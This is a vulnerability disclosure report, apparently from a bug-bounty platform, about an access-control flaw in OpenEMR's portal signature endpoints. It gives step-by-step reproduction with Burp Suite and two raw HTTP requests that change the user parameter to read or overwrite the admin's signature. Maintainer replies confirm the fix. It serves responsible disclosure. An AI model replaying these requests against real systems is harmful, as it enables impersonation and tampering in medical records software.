User can do all actives with other's signature (view, get, create, update, delete,...) in openemr/openemr
Reported on
Aug 2nd 2022
Description
I observed that users can view any user's signature by changing their user parameter to other's user parameter. By the same way users can create/delete/update other's signature in create signature function.
View/Get other's signature:
1. Login to an account (I use account receptionist).
2. Click "Portal > Portal Audits > Home > Signature on File > Use Current " to view your own signature. Intercept this request with Burpsuite. ( Ensure you created your signature before).
3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5)
4. Send request, you will see the signature of admin is sent in response.
Create/Update/Delete other's signature:
1. Login to an account (I use account receptionist).
2. Click "Portal > Portal Audits > Home > Signature on File > {Sign your signature} > Sign and Save " to create your own signature. Intercept this request with Burpsuite.
3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5)
4. Send this request.
5. Login with admin account. You will see admin's signature was created.
Proof of Concept
View/Get other's signature:
POST /openemr/portal/sign/lib/show-signature.php HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
Content-Length: 61
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Accept: application/json, text/plain, */*
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.openemr.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.openemr.io/openemr/portal/patient/provider
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"pid":"0","user":"5","is_portal":0,"type":"admin-signature"}
Create/Update/Delete other's signature:
POST /openemr/portal/sign/lib/save-signature.php HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
Content-Length: 39622
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/json
Accept: */*
Origin: https://demo.openemr.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.openemr.io/openemr/portal/patient/provider
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"pid":"0","user":"5","is_portal":0,"signer":"Barbara Wallace","type":"admin-signature","output":"content of signature image in base64"
Impact
Attacker can get/create/update any user's signature including admin's signature. As a result, he/she can impersonate admin or anyone to perform actions.
Occurrences
A preliminary fix has been posted in commit c5d99452c173ef21a8e2241e2bbf4b66e2d7fe11
Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in the next few days. After I do that, then will be ok to make CVE # and make it public.
Thanks!
OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.
